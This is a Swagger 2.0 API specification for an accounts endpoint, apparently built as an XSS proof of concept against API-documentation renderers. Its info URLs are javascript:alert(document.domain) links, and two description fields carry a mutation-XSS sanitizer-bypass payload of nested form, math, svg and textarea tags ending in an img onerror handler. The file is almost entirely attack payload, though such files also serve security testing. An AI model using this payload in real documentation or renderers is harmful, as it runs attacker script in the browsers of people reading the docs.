swagger: '2.0'
info:
  title: Classic API Resource Documentation
  termsOfServiceUrl: "javascript:alert(document.domain)"
  url: "javascript:alert(document.domain)"
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []

paths:
  /accounts:
    get:
      responses:
        '200':
          description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form>
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts

